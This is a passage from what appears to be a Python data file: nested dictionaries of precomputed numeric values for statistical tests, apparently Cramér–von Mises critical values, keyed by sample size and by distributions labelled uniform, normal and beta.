{'uni': 0.18480486550722386, 'nor': 0.5420471845411214, 'beta1': 0.18425739128256488, 'beta2': 0.49803792491577076, 'beta4': 0.1170983391444022}, 200: {'uni': 0.18410247561395535, 'nor': 0.4225705571887114, 'beta1': 0.1832629600404925, 'beta2': 0.3991187761792379, 'beta4': 0.12520010138008653}, 150: {'uni': 0.1831379504788031, 'nor': 0.35378535669622957, 'beta1': 0.18393102377460066, 'beta2': 0.3533201625197048, 'beta4': 0.1310612284316026}, 100: {'uni': 0.1851477358277497, 'nor': 0.30048949272859776, 'beta1': 0.18722881633512647, 'beta2': 0.2982703912186853, 'beta4': 0.13952949011220495}, 75: {'uni': 0.18420407052491966, 'nor': 0.2747464150268231, 'beta1': 0.1863893010233449, 'beta2': 0.2688833428777913, 'beta4': 0.14483526902687105}, 50: {'uni': 0.18272037174239453, 'nor': 0.24499943819688966, 'beta1': 0.18396142930712786, 'beta2': 0.23860133327254135, 'beta4': 0.15513414164226877}, 30: {'uni': 0.1842369811339266, 'nor': 0.21925965780532913, 'beta1': 0.18267665781136008, 'beta2': 0.21345155008926986, 'beta4': 0.16315465295018947}, 20: {'uni': 0.18596055862126862, 'nor': 0.20895267177449817, 'beta1': 0.18242691039042175, 'beta2': 0.20282499131835807, 'beta4': 0.17122285192412554}, 10: {'uni': 0.18557308492410754, 'nor': 0.19918179801171515, 'beta1': 0.1840271099140626, 'beta2': 0.1938309824025229, 'beta4': 0.1767417121054671}}, 75: {1000: {'uni': 0.20711268462000337, 'nor': 1.7730177547589154, 'beta1': 0.1869960981370644, 'beta2': 1.2726475334757859, 'beta4': 0.100342571351767}, 750: {'uni': 0.20243866747068975, 'nor': 1.3991570539695792, 'beta1': 0.18513552603442698, 'beta2': 1.0017005109802415, 'beta4': 0.10276510802172498}, 500: {'uni': 0.1965709888981754, 'nor': 0.9742389984198174, 'beta1': 0.18355281840357834, 'beta2': 0.80284673792362, 'beta4': 0.10644357393348948}, 400: {'uni': 0.19146567109436297, 'nor': 0.841354076993409, 'beta1': 0.1855585099111213, 'beta2': 0.6565346919964216, 'beta4': 0.10781413077990055}, 300: {'uni': 0.18767169125550484, 'nor': 
0.6612307292158803, 'beta1': 0.18405456456460575, 'beta2': 0.575015165674034, 'beta4': 0.11340006488072128}, 200: {'uni': 0.18875684035705986, 'nor': 0.5001358507311437, 'beta1': 0.18514163593432517, 'beta2': 0.44825655120643315, 'beta4': 0.11771535031911876}, 150: {'uni': 0.18273849384781432, 'nor': 0.4231160741504525, 'beta1': 0.18561439219437587, 'beta2': 0.38137814444752033, 'beta4': 0.1262731157515569}, 100: {'uni': 0.18225839061196816, 'nor': 0.338619585958276, 'beta1': 0.18186852876160955, 'beta2': 0.31617844744686563, 'beta4': 0.13374500648884993}, 75: {'uni': 0.18299158238453536, 'nor': 0.29961345440771225, 'beta1': 0.18696060459585148, 'beta2': 0.28468953064421093, 'beta4': 0.13946308848404163}, 50: {'uni': 0.1832723234116953, 'nor': 0.26283989390926227, 'beta1': 0.18506600379584687, 'beta2': 0.24750497454599002, 'beta4': 0.1481327869764839}, 30: {'uni': 0.18191405722869375, 'nor': 0.23431812960162796, 'beta1': 0.18521277623339458, 'beta2': 0.22079273390393087, 'beta4': 0.1592348611407742}, 20: {'uni': 0.18473341697360826, 'nor': 0.2195649379961785, 'beta1': 0.18563835105682194, 'beta2': 0.20770543157127955, 'beta4': 0.16479815778328769}, 10: {'uni': 0.18506924782584366, 'nor': 0.20570651820563146, 'beta1': 0.1866075791349083, 'beta2': 0.19341244195911075, 'beta4': 0.17748207906313238}}, 50: {1000: {'uni': 0.24103040620532545, 'nor': 2.627239706679091, 'beta1': 0.1874509583911653, 'beta2': 1.5677617919882278, 'beta4': 0.09789020561766841}, 750: {'uni': 0.22444541668429782, 'nor': 2.015315850284036, 'beta1': 0.18823153541894252, 'beta2': 1.2133199248338002, 'beta4': 0.09979798541763203}, 500: {'uni': 0.2104911731606476, 'nor': 1.38982671099465, 'beta1': 0.18746213379969717, 'beta2': 0.9366731794445591, 'beta4': 0.10269358339160997}, 400: {'uni': 0.20531070615513639, 'nor': 1.148301345520581, 'beta1': 0.18554521120654618, 'beta2': 0.7860055480947616, 'beta4': 0.10501089981968535}, 300: {'uni': 0.19934989819705742, 'nor': 0.8993661590744696, 'beta1': 
0.18318293203211186, 'beta2': 0.6644979497197328, 'beta4': 0.10756412793208994}, 200: {'uni': 0.1921846611195358, 'nor': 0.6606908760158289, 'beta1': 0.18423109397748733, 'beta2': 0.5140542101443047, 'beta4': 0.11311740549405308}, 150: {'uni': 0.18961104398723572, 'nor': 0.5431369687165466, 'beta1': 0.18627983842993445, 'beta2': 0.43577804383019, 'beta4': 0.11788729433993039}, 100: {'uni': 0.18510814836165915, 'nor': 0.43114936330892584, 'beta1': 0.18448355982106907, 'beta2': 0.35642356479702164, 'beta4': 0.12452405723524114}, 75: {'uni': 0.18347411444813314, 'nor': 0.3665250370541888, 'beta1': 0.18489904225754517, 'beta2': 0.3207238999009413, 'beta4': 0.13094014210262298}, 50: {'uni': 0.18152653854784864, 'nor': 0.3021554777109189, 'beta1': 0.1855837950623708, 'beta2': 0.26894400195384355, 'beta4': 0.13977255851048295}, 30: {'uni': 0.17944329155456532, 'nor': 0.25589954702925916, 'beta1': 0.18177564577800395, 'beta2': 0.2259481098108176, 'beta4': 0.15087949281315094}, 20: {'uni': 0.18285848202810834, 'nor': 0.23495619641475976, 'beta1': 0.18418902422158248, 'beta2': 0.21053639359909057, 'beta4': 0.16289925871937844}, 10: {'uni': 0.18270695707991996, 'nor': 0.2096678137972554, 'beta1': 0.18653089016810714, 'beta2': 0.19684068664753132, 'beta4': 0.1704553669593008}}, 30: {1000: {'uni': 0.35059610653095774, 'nor': 4.278063195318857, 'beta1': 0.20388816838421095, 'beta2': 1.930305431945286, 'beta4': 0.09798289618718463}, 750: {'uni': 0.30507003691713097, 'nor': 3.21820776280224, 'beta1': 0.19622584473615895, 'beta2': 1.5979743998440465, 'beta4': 0.09714954501361119}, 500: {'uni': 0.26008473519802, 'nor': 2.2497384827957188, 'beta1': 0.1924900551191556, 'beta2': 1.1740862526243834, 'beta4': 0.09932387680106194}, 400: {'uni': 0.246066913448192, 'nor': 1.8039541962199412, 'beta1': 0.19029154767051165, 'beta2': 0.9792810501146351, 'beta4': 0.10044308660904461}, 300: {'uni': 0.22837881683581426, 'nor': 1.3951249872303733, 'beta1': 0.18464244517695091, 'beta2': 
0.7923064688616753, 'beta4': 0.10371786223959582}, 200: {'uni': 0.2096008117213653, 'nor': 0.9894495628252942, 'beta1': 0.18661453750912715, 'beta2': 0.6265848402430967, 'beta4': 0.1058001385440015}, 150: {'uni': 0.2047520758256172, 'nor': 0.7821984888895062, 'beta1': 0.18759321457289763, 'beta2': 0.5198694245808844, 'beta4': 0.10807280355877953}, 100: {'uni': 0.19121268890754203, 'nor': 0.5928634651322495, 'beta1': 0.1840954961076464, 'beta2': 0.4184841874770464, 'beta4': 0.11527272387605526}, 75: {'uni': 0.1912910963358721, 'nor': 0.48913096110692394, 'beta1': 0.18215208706652994, 'beta2': 0.3547928099573867, 'beta4': 0.11922051901033888}, 50: {'uni': 0.18440606056882947, 'nor': 0.39561565247457786, 'beta1': 0.18223908669314237, 'beta2': 0.30220319429490433, 'beta4': 0.12812440980731452}, 30: {'uni': 0.18222407004959135, 'nor': 0.30418682264129604, 'beta1': 0.18679408185790608, 'beta2': 0.2491166973284583, 'beta4': 0.13942212483224153}, 20: {'uni': 0.18097656955489333, 'nor': 0.26515944288371085, 'beta1': 0.18367253348921583, 'beta2': 0.22596040797528127, 'beta4': 0.14749125985662656}, 10: {'uni': 0.1812785781213858, 'nor': 0.22411839439365913, 'beta1': 0.18377973985540141, 'beta2': 0.20261486000614173, 'beta4': 0.16383998193988902}}, 20: {1000: {'uni': 0.557588775025206, 'nor': 6.23263722804059, 'beta1': 0.24824273547433398, 'beta2': 2.5916665978624773, 'beta4': 0.09556521996049769}, 750: {'uni': 0.45544548344679703, 'nor': 4.960783858737055, 'beta1': 0.2315334208360766, 'beta2': 2.116834484867373, 'beta4': 0.09605379123194507}, 500: {'uni': 0.36047636166919345, 'nor': 3.2882260206430223, 'beta1': 0.21162692388832308, 'beta2': 1.4976707301720542, 'beta4': 0.09610105856086308}, 400: {'uni': 0.3196200397941912, 'nor': 2.6396332773464715, 'beta1': 0.2046928363598519, 'beta2': 1.265541898484928, 'beta4': 0.09827851131902052}, 300: {'uni': 0.28281307995759886, 'nor': 2.011907686223302, 'beta1': 0.1998415817930172, 'beta2': 0.9828568650064285, 'beta4': 
0.09994987623415}, 200: {'uni': 0.24538969043580305, 'nor': 1.407599774702493, 'beta1': 0.19433833988424531, 'beta2': 0.7602852314379016, 'beta4': 0.10173240503051327}, 150: {'uni': 0.22623111278829658, 'nor': 1.1172309316240872, 'beta1': 0.1893663211990802, 'beta2': 0.6112263086634806, 'beta4': 0.10524857569135072}, 100: {'uni': 0.21033799716194235, 'nor': 0.7960728357807297, 'beta1': 0.18863382329214456, 'beta2': 0.48583796438531557, 'beta4': 0.10944951155940488}, 75: {'uni': 0.20239363660320567, 'nor': 0.653354873083433, 'beta1': 0.18465183242228214, 'beta2': 0.40852522362409677, 'beta4': 0.11117099248230677}, 50: {'uni': 0.19241628654888826, 'nor': 0.49230178420719256, 'beta1': 0.18370029558550202, 'beta2': 0.3315673506671088, 'beta4': 0.12034526923407932}, 30: {'uni': 0.1838470566331029, 'nor': 0.3690970245177923, 'beta1': 0.18158906884639572, 'beta2': 0.2703572480667707, 'beta4': 0.1305763969399149}, 20: {'uni': 0.18439013813515145, 'nor': 0.3113933846355926, 'beta1': 0.18171723618996996, 'beta2': 0.2369287296609353, 'beta4': 0.13967615415157159}, 10: {'uni': 0.18179638952526822, 'nor': 0.24629649064457582, 'beta1': 0.18144757035417675, 'beta2': 0.20971828838261652, 'beta4': 0.15608505701021883}}, 10: {1000: {'uni': 1.630169780842474, 'nor': 13.623294187847977, 'beta1': 0.6537074318170204, 'beta2': 4.838110857510732, 'beta4': 0.09413800337231777}, 750: {'uni': 1.2606778724851384, 'nor': 9.898087519223337, 'beta1': 0.5360828395709647, 'beta2': 3.755077850787192, 'beta4': 0.09609909813587005}, 500: {'uni': 0.866979270399114, 'nor': 6.86185146993719, 'beta1': 0.40719109616766064, 'beta2': 2.486938148944695, 'beta4': 0.09657207917263508}, 400: {'uni': 0.7234311603303463, 'nor': 5.533257506558093, 'beta1': 0.35555181458287194, 'beta2': 2.0684678266516845, 'beta4': 0.09575639679537408}, 300: {'uni': 0.5740562572746054, 'nor': 4.13961208846063, 'beta1': 0.30947004057833194, 'beta2': 1.5733033072118243, 'beta4': 0.09716579757282962}, 200: {'uni': 0.43012982000413774, 
'nor': 2.806431923980102, 'beta1': 0.25923513854877184, 'beta2': 1.1217059286617272, 'beta4': 0.09769834869400658}, 150: {'uni': 0.3660568810176042, 'nor': 2.165907302955124, 'beta1': 0.2367881673186339, 'beta2': 0.8900796906245184, 'beta4': 0.0986555241279555}, 100: {'uni': 0.2963521456078561, 'nor': 1.4423314673071785, 'beta1': 0.21603240846651683, 'beta2': 0.6539876622911982, 'beta4': 0.101203675655721}, 75: {'uni': 0.26296739530637186, 'nor': 1.1761992322784602, 'beta1': 0.20484690859183285, 'beta2': 0.5351984389092316, 'beta4': 0.10492040345498926}, 50: {'uni': 0.22994652917703381, 'nor': 0.8431170822039252, 'beta1': 0.19350639779310821, 'beta2': 0.43102251731484564, 'beta4': 0.10827771561061793}, 30: {'uni': 0.2033383416551495, 'nor': 0.5806932221078154, 'beta1': 0.18502168086844142, 'beta2': 0.3218406334608748, 'beta4': 0.11399907323057486}, 20: {'uni': 0.1923057509260784, 'nor': 0.44699498766501866, 'beta1': 0.18199021346561728, 'beta2': 0.26969550832768435, 'beta4': 0.12249371308737968}, 10: {'uni': 0.17887078242976767, 'nor': 0.31761146933960366, 'beta1': 0.1766444136945467, 'beta2': 0.21765707501491735, 'beta4': 0.13832752334780735}}}} # noqa: E501, E231 crit_dist_upd_cm = {0.05: {1000: {1000: {'uni': 0.013833831976126072, 'beta1': 0.0003329885568229087, 'beta2': 0.22974622882027226, 'beta4': [0.0018908295164874612, 1.0697194182314242]}, 750: {'uni': 0.016990917368002133, 'beta1': 0.0006113165919820284, 'beta2': 0.23684284676662615, 'beta4': [0.002770944333718528, 1.0556667242656854]}, 500: {'uni': 0.023600774750904736, 'beta1': 0.0009199173841866722, 'beta2': 0.2753909552830473, 'beta4': [0.0037082814337906045, 1.0482794905722563]}, 400: {'uni': 0.02640029217064558, 'beta1': 0.0013622133600444137, 'beta2': 0.27352545783196475, 'beta4': [0.005913349923484303, 1.0456546892584218]}, 300: {'uni': 0.04006129826220925, 'beta1': 0.002720238345700929, 'beta2': 0.292583092890596, 'beta4': [0.007281293542356923, 1.0400206581224385]}, 200: {'uni': 
0.07032909758220027, 'beta1': 0.005970864163422045, 'beta2': 0.34167794009457075, 'beta4': [0.009494471525280058, 1.0349849380276617]}, 150: {'uni': 0.1012642936451668, 'beta1': 0.013652756645306451, 'beta2': 0.39479224192835694, 'beta4': [0.01194023988657095, 1.0281722066537058]}, 100: {'uni': 0.13313776389084864, 'beta1': 0.022784367464349673, 'beta2': 0.41847533458373803, 'beta4': [0.020038218784910505, 1.0236478943934566]}, 75: {'uni': 0.14039046466276972, 'beta1': 0.04097056181025277, 'beta2': 0.46162284607879156, 'beta4': [0.0243947240305133, 1.0222016752862486]}, 50: {'uni': 0.22621965744544004, 'beta1': 0.0737194908849337, 'beta2': 0.517884604992627, 'beta4': [0.03269564227543516, 1.0182370445806526]}, 30: {'uni': 0.3065027272179305, 'beta1': 0.19186519999119622, 'beta2': 0.6071682127005255, 'beta4': [0.05374474739717058, 1.0137406936599733]}, 20: {'uni': 0.4579999299085743, 'beta1': 0.26347326935911947, 'beta2': 0.6609864081120751, 'beta4': [0.07348286747648815, 1.0145791780700397]}, 10: {'uni': 0.7093161375782928, 'beta1': 0.5119588745735099, 'beta2': 0.8207303938633076, 'beta4': [0.12023859377021034, 1.0100370019812506]}}, 750: {1000: {'uni': 0.01647447307790564, 'beta1': 0.0005070015607912077, 'beta2': 0.2629768360729676, 'beta4': [0.0033495902420869147, 1.0812966928373942]}, 750: {'uni': 0.018829802981785562, 'beta1': 0.0004891759389985897, 'beta2': 0.264938253953924, 'beta4': [0.0031531587883013427, 1.0792673641589363]}, 500: {'uni': 0.024080037100477052, 'beta1': 0.0012244937314284828, 'beta2': 0.24359686255819019, 'beta4': [0.004206903547084224, 1.076095067847491]}, 400: {'uni': 0.027584807407406455, 'beta1': 0.0016752340265126897, 'beta2': 0.26260070623151555, 'beta4': [0.005580712827419352, 1.060010603580021]}, 300: {'uni': 0.05146390929515149, 'beta1': 0.0026509847812920093, 'beta2': 0.303092230265923, 'beta4': [0.006365207456983704, 1.0541922110575421]}, 200: {'uni': 0.059327890449950973, 'beta1': 0.006979003319027128, 'beta2': 
0.31285174277571925, 'beta4': [0.010945442489642966, 1.0474108448665012]}, 150: {'uni': 0.07603679549416355, 'beta1': 0.013496169428675047, 'beta2': 0.3555003501031682, 'beta4': [0.012749501962998663, 1.0375483550076372]}, 100: {'uni': 0.10561248103143273, 'beta1': 0.03187318794369734, 'beta2': 0.417146268097644, 'beta4': [0.020713494340326415, 1.0335080956133786]}, 75: {'uni': 0.14405962731563504, 'beta1': 0.043732800833889925, 'beta2': 0.4610806633425333, 'beta4': [0.02597652100879122, 1.0295014609635151]}, 50: {'uni': 0.20966063546789582, 'beta1': 0.07890839084581142, 'beta2': 0.5102418622987501, 'beta4': [0.043904941213022464, 1.0248461468788301]}, 30: {'uni': 0.38962310099779707, 'beta1': 0.1915135222435897, 'beta2': 0.6101573464223917, 'beta4': [0.06118300251929863, 1.0194659530900299]}, 20: {'uni': 0.428272065096665, 'beta1': 0.2518149043542126, 'beta2': 0.6947446253738557, 'beta4': [0.07492008381074046, 1.017655002271037]}, 10: {'uni': 0.7045396300117182, 'beta1': 0.5239027718500835, 'beta2': 0.8357669029306978, 'beta4': [0.11572334717911056, 1.0123883559270712]}}, 500: {1000: {'uni': 0.027224573572945946, 'beta1': 0.0013397428793559755, 'beta2': 0.3001985870543363, 'beta4': [0.004003070786742122, 1.1172596869640967]}, 750: {'uni': 0.028043993584209094, 'beta1': 0.0010541824335439582, 'beta2': 0.2823382920552223, 'beta4': [0.0036581315313476436, 1.1034623133987689]}, 500: {'uni': 0.02471763430703555, 'beta1': 0.0012248560308923057, 'beta2': 0.3307660083666149, 'beta4': [0.003302816728501824, 1.0934914146805519]}, 400: {'uni': 0.03236939986555113, 'beta1': 0.001492188135934995, 'beta2': 0.2834271159680854, 'beta4': [0.005281401022483379, 1.0858354786705675]}, 300: {'uni': 0.03914763722813296, 'beta1': 0.003120837500885247, 'beta2': 0.3326263681825811, 'beta4': [0.0059725430409256035, 1.080984369602341]}, 200: {'uni': 0.0674042868008787, 'beta1': 0.006767448043648924, 'beta2': 0.3349053851571213, 'beta4': [0.011969283802141791, 1.064357245786229]}, 150: 
{'uni': 0.082100927216335, 'beta1': 0.015091611739326043, 'beta2': 0.36047891136615184, 'beta4': [0.012143500193535273, 1.0603960329700548]}, 100: {'uni': 0.11090915635366168, 'beta1': 0.027855094159398915, 'beta2': 0.3960346148033574, 'beta4': [0.019873043933564375, 1.046442261406773]}, 75: {'uni': 0.13673584694945418, 'beta1': 0.04335726498923612, 'beta2': 0.46353116897047625, 'beta4': [0.022393899130873997, 1.0454004320894406]}, 50: {'uni': 0.26894500541594535, 'beta1': 0.07457662656723034, 'beta2': 0.5208863650222786, 'beta4': [0.036275561342054785, 1.0352702855461442]}, 30: {'uni': 0.3716936672337271, 'beta1': 0.17149387158728827, 'beta2': 0.6186004901982012, 'beta4': [0.06131349205497524, 1.0286449977262795]}, 20: {'uni': 0.467854736258422, 'beta1': 0.2513799996100335, 'beta2': 0.7006936802929652, 'beta4': [0.08626269634774561, 1.0230576102360847]}, 10: {'uni': 0.7362089605117925, 'beta1': 0.56086440263617, 'beta2': 0.8099518386992302, 'beta4': [0.11677030825502484, 1.0190838199658914]}}, 400: {1000: {'uni': 0.025284520784155894, 'beta1': 0.0016403734885094123, 'beta2': 0.31576478638382965, 'beta4': [0.004799521441428401, 1.149091195956356]}, 750: {'uni': 0.027799931928113246, 'beta1': 0.0015799682859719154, 'beta2': 0.3713849781520663, 'beta4': [0.004689070159467552, 1.124317344925337]}, 500: {'uni': 0.027483125208737986, 'beta1': 0.0024269483783257067, 'beta2': 0.27701755632147346, 'beta4': [0.004591320892501386, 1.1297845739588293]}, 400: {'uni': 0.03084627816775358, 'beta1': 0.0023979691180455814, 'beta2': 0.2730921713151016, 'beta4': [0.004974023608712, 1.106968985947837]}, 300: {'uni': 0.04342497872614666, 'beta1': 0.005122316708978925, 'beta2': 0.30396801422598557, 'beta4': [0.005941217951056899, 1.0999705260170498]}, 200: {'uni': 0.06731729987144204, 'beta1': 0.006636474398841804, 'beta2': 0.32885187834473645, 'beta4': [0.00949566072118334, 1.0888691708222482]}, 150: {'uni': 0.08264251761514971, 'beta1': 0.010132361123248543, 'beta2': 
0.36101864325194, 'beta4': [0.012446278508938115, 1.0763280315015658]}, 100: {'uni': 0.10637172944422692, 'beta1': 0.01878644943776261, 'beta2': 0.4093008044094355, 'beta4': [0.020820333377676758, 1.06113616348469]}, 75: {'uni': 0.13795394349254128, 'beta1': 0.038995240660645046, 'beta2': 0.4405290225383519, 'beta4': [0.02473764963709022, 1.0527356149901959]}, 50: {'uni': 0.2406132500211715, 'beta1': 0.0700599044565557, 'beta2': 0.5265650730092543, 'beta4': [0.0339903732354553, 1.0462654860073552]}, 30: {'uni': 0.3173806374952389, 'beta1': 0.18444265554793618, 'beta2': 0.6325883170629072, 'beta4': [0.06610429250040999, 1.0355934184804019]}, 20: {'uni': 0.423548511058078, 'beta1': 0.25465448942736657, 'beta2': 0.6725333843878142, 'beta4': [0.07438553906653562, 1.0311030590947072]}, 10: {'uni': 0.6688467656594845, 'beta1': 0.5112523271928556, 'beta2': 0.8293005648094274, 'beta4': [0.1197769525104218, 1.0249310486188403]}}, 300: {1000: {'uni': 0.03646544382648058, 'beta1': 0.003251490535066205, 'beta2': 0.3201872293239301, 'beta4': [0.006951397024167792, 1.193926518402875]}, 750: {'uni': 0.03648594176728415, 'beta1': 0.002636200271072265, 'beta2': 0.3174843999565502, 'beta4': [0.006473086994037532, 1.183601205377894]}, 500: {'uni': 0.04072652314645194, 'beta1': 0.002558944110032064, 'beta2': 0.3251984717738673, 'beta4': [0.007789765735562143, 1.1835748123967167]}, 400: {'uni': 0.0393383633533453, 'beta1': 0.003847932927579061, 'beta2': 0.2860643127801613, 'beta4': [0.0062386354375463336, 1.1654789898222022]}, 300: {'uni': 0.04397095573137874, 'beta1': 0.0030280024317967777, 'beta2': 0.3789180859983394, 'beta4': [0.009249413107330818, 1.127841007910807]}, 200: {'uni': 0.06792667259937368, 'beta1': 0.005983841955930665, 'beta2': 0.3413062807433401, 'beta4': [0.009552799854332017, 1.0999288094012698]}, 150: {'uni': 0.0869747164851829, 'beta1': 0.012290799030814667, 'beta2': 0.3649645571564334, 'beta4': [0.014748639591924993, 1.0996203885277052]}, 100: {'uni': 
0.11636318979764056, 'beta1': 0.02817460092180575, 'beta2': 0.4096280985600957, 'beta4': [0.01922673614387383, 1.0813822423223525]}, 75: {'uni': 0.15706280301874442, 'beta1': 0.039130351614999406, 'beta2': 0.42263093869109436, 'beta4': [0.024857576975933136, 1.0690602414012946]}, 50: {'uni': 0.28048873616461506, 'beta1': 0.06810514058491184, 'beta2': 0.5234093698507445, 'beta4': [0.037664123441808646, 1.0630363349497096]}, 30: {'uni': 0.3213033129924418, 'beta1': 0.16748462352883312, 'beta2': 0.6323735870294098, 'beta4': [0.05278897520198084, 1.0554917161294344]}, 20: {'uni': 0.5291733323766079, 'beta1': 0.2881578438762836, 'beta2': 0.7065202369109715, 'beta4': [0.07581480967034805, 1.043877964407442]}, 10: {'uni': 0.6636936363784581, 'beta1': 0.5173161477349097, 'beta2': 0.8275178393484293, 'beta4': [0.11949087211913659, 1.030446523297133]}}, 200: {1000: {'uni': 0.056736728276972896, 'beta1': 0.006839089656716795, 'beta2': 0.3272153807911214, 'beta4': [0.008455904960003245, 1.248625041859922]}, 750: {'uni': 0.05163279737714969, 'beta1': 0.010730487701533719, 'beta2': 0.3635515979264522, 'beta4': [0.007813754917837435, 1.2349194372374692]}, 500: {'uni': 0.05338620611203703, 'beta1': 0.006038477096334755, 'beta2': 0.3359196893924308, 'beta4': [0.011917568033129048, 1.2117966329062095]}, 400: {'uni': 0.058860799267621965, 'beta1': 0.0063165150330285426, 'beta2': 0.3789779915309377, 'beta4': [0.009755269735322647, 1.1804431185986555]}, 300: {'uni': 0.07153008954664851, 'beta1': 0.011047298709712905, 'beta2': 0.42900186641443894, 'beta4': [0.009584723093740515, 1.1880360664225362]}, 200: {'uni': 0.06344836733337247, 'beta1': 0.00781338886239747, 'beta2': 0.38781497493064176, 'beta4': [0.009797652441966509, 1.1638617512261697]}, 150: {'uni': 0.07459560420290043, 'beta1': 0.014056540580835258, 'beta2': 0.39046599800764625, 'beta4': [0.01168897465145889, 1.143775876304623]}, 100: {'uni': 0.11462970160562651, 'beta1': 0.025847066135830016, 'beta2': 0.39498442294942704, 
'beta4': [0.01690940914502444, 1.1220874640395795]}, 75: {'uni': 0.14759832305943538, 'beta1': 0.047967300368844945, 'beta2': 0.43098417504532077, 'beta4': [0.031171793994368147, 1.1060770360134216]}, 50: {'uni': 0.23542071804173764, 'beta1': 0.09719199816075956, 'beta2': 0.5013506677050935, 'beta4': [0.03824146010789057, 1.1001663175850784]}, 30: {'uni': 0.3096592063935794, 'beta1': 0.15176694546522967, 'beta2': 0.5802936759286862, 'beta4': [0.0520104795571762, 1.0790703149850533]}, 20: {'uni': 0.45262915303228857, 'beta1': 0.261027201183725, 'beta2': 0.6364867032723682, 'beta4': [0.07130296373607303, 1.0621513268964007]}, 10: {'uni': 0.7295542697541142, 'beta1': 0.5124743313750191, 'beta2': 0.8144547112453855, 'beta4': [0.12479877669495536, 1.0515776201768678]}}, 150: {1000: {'uni': 0.07909618379520475, 'beta1': 0.009086321462188735, 'beta2': 0.4106450929510854, 'beta4': [0.012610658427334429, 1.2924313816625217]}, 750: {'uni': 0.07407325699561099, 'beta1': 0.014177338709786392, 'beta2': 0.4420930391617977, 'beta4': [0.014296507845962717, 1.3032443798682725]}, 500: {'uni': 0.07511369957824804, 'beta1': 0.01459171218041179, 'beta2': 0.47288468448977605, 'beta4': [0.013729395246877836, 1.251141347455903]}, 400: {'uni': 0.06944188808191638, 'beta1': 0.011176061659909423, 'beta2': 0.4035923111579738, 'beta4': [0.0125839858594099, 1.252919423776858]}, 300: {'uni': 0.06438335011755501, 'beta1': 0.016931344535076297, 'beta2': 0.4162306964573891, 'beta4': [0.010744824447481266, 1.222923097027982]}, 200: {'uni': 0.083964124476108, 'beta1': 0.014056137289547922, 'beta2': 0.4075437900930126, 'beta4': [0.013111563370934956, 1.2255955330645523]}, 150: {'uni': 0.07981799506756729, 'beta1': 0.01064409388613912, 'beta2': 0.3894789166335232, 'beta4': [0.023018732181305603, 1.2038155048533767]}, 100: {'uni': 0.14488849486361138, 'beta1': 0.020965041261413544, 'beta2': 0.5435612537940565, 'beta4': [0.01967025175597771, 1.1751658929630506]}, 75: {'uni': 0.12897242715258447, 'beta1': 
0.05785618914959902, 'beta2': 0.4826347696087146, 'beta4': [0.02126529804324562, 1.1451923798322048]}, 50: {'uni': 0.21140150701110877, 'beta1': 0.10005146878076632, 'beta2': 0.5218040110926477, 'beta4': [0.036922327127357234, 1.1380283919405332]}, 30: {'uni': 0.31984297162744296, 'beta1': 0.1673346729784614, 'beta2': 0.5899636395543545, 'beta4': [0.056428456138648345, 1.0993767784566557]}, 20: {'uni': 0.4803508464303079, 'beta1': 0.2591276485033553, 'beta2': 0.6504322077039979, 'beta4': [0.07569043282680564, 1.0812645201801898]}, 10: {'uni': 0.6662991959861223, 'beta1': 0.5623584413477307, 'beta2': 0.7961858685655749, 'beta4': [0.11637566937767005, 1.0580619720265005]}}, 100: {1000: {'uni': 0.14063611585827807, 'beta1': 0.031228653444278272, 'beta2': 0.47970305740153707, 'beta4': [0.02119406846518135, 1.4093426070113058]}, 750: {'uni': 0.11080279866278557, 'beta1': 0.024578272682976215, 'beta2': 0.4781884547127654, 'beta4': [0.017108452919179756, 1.41979885240354]}, 500: {'uni': 0.11770170054806148, 'beta1': 0.022738881695332867, 'beta2': 0.5844182960912642, 'beta4': [0.019660423184423573, 1.4047538191133986]}, 400: {'uni': 0.09926981160838831, 'beta1': 0.02219582292278474, 'beta2': 0.671019314550252, 'beta4': [0.02316966058932741, 1.3998233294106437]}, 300: {'uni': 0.11165748604091662, 'beta1': 0.029124281889602723, 'beta2': 0.4721222552275545, 'beta4': [0.021756365768324605, 1.3290924202376428]}, 200: {'uni': 0.12905012210969638, 'beta1': 0.02094718575899271, 'beta2': 0.47904864964482474, 'beta4': [0.022053897791131153, 1.2965456498187415]}, 150: {'uni': 0.11436257112395143, 'beta1': 0.027233016603507326, 'beta2': 0.505711169362763, 'beta4': [0.018463812410358174, 1.296183093117874]}, 100: {'uni': 0.1207577987530685, 'beta1': 0.03071522925704068, 'beta2': 0.477800710856348, 'beta4': [0.024519964931620897, 1.275243559696543]}, 75: {'uni': 0.19331469072257756, 'beta1': 0.02696019246477948, 'beta2': 0.5161607373371395, 'beta4': [0.026456646897275147, 
1.2178304835805245]}, 50: {'uni': 0.2191415739843373, 'beta1': 0.06910385300920173, 'beta2': 0.5324442515990134, 'beta4': [0.03663912620751329, 1.1950430051511647]}, 30: {'uni': 0.27736623923689757, 'beta1': 0.15478071905259447, 'beta2': 0.6146633897712037, 'beta4': [0.05959673655496849, 1.1665156813618243]}, 20: {'uni': 0.40196115583372394, 'beta1': 0.2862799604210803, 'beta2': 0.6607899949419531, 'beta4': [0.0746458492423967, 1.1291374980340438]}, 10: {'uni': 0.6470479117720613, 'beta1': 0.5267194757051761, 'beta2': 0.8293978979725132, 'beta4': [0.13187127875511187, 1.1065295182068606]}}, 75: {1000: {'uni': 0.1515786966922324, 'beta1': 0.04592846518156684, 'beta2': 0.49675994638091236, 'beta4': [0.025848246678429294, 1.4979277518131913]}, 750: {'uni': 0.1359250794409579, 'beta1': 0.06269301788506419, 'beta2': 0.5300280831252744, 'beta4': [0.03172730420284062, 1.5582769770959521]}, 500: {'uni': 0.1489293835461733, 'beta1': 0.03758607283821415, 'beta2': 0.5591068809725539, 'beta4': [0.0290073547842622, 1.5015503418584653]}, 400: {'uni': 0.1620614533244523, 'beta1': 0.05170070240507436, 'beta2': 0.5319186060243111, 'beta4': [0.03172398797428782, 1.493476350917158]}, 300: {'uni': 0.17057859098038355, 'beta1': 0.04058586637229189, 'beta2': 0.6618855931935482, 'beta4': [0.023707512357693854, 1.5208629132217224]}, 200: {'uni': 0.16919617696560252, 'beta1': 0.044511575340384274, 'beta2': 0.5604502346566455, 'beta4': [0.023421519588066396, 1.376070096376646]}, 150: {'uni': 0.16038601440082725, 'beta1': 0.04466704954413228, 'beta2': 0.5364478230042707, 'beta4': [0.02269054266192888, 1.3659137244555777]}, 100: {'uni': 0.16697780890015043, 'beta1': 0.05780266344429386, 'beta2': 0.6598988497330642, 'beta4': [0.02269683312496209, 1.3064106529050417]}, 75: {'uni': 0.18936779659288844, 'beta1': 0.0528588404071561, 'beta2': 0.5024015892218546, 'beta4': [0.02722661600125422, 1.2880066034829047]}, 50: {'uni': 0.23900875770128244, 'beta1': 0.08314836009999102, 'beta2': 
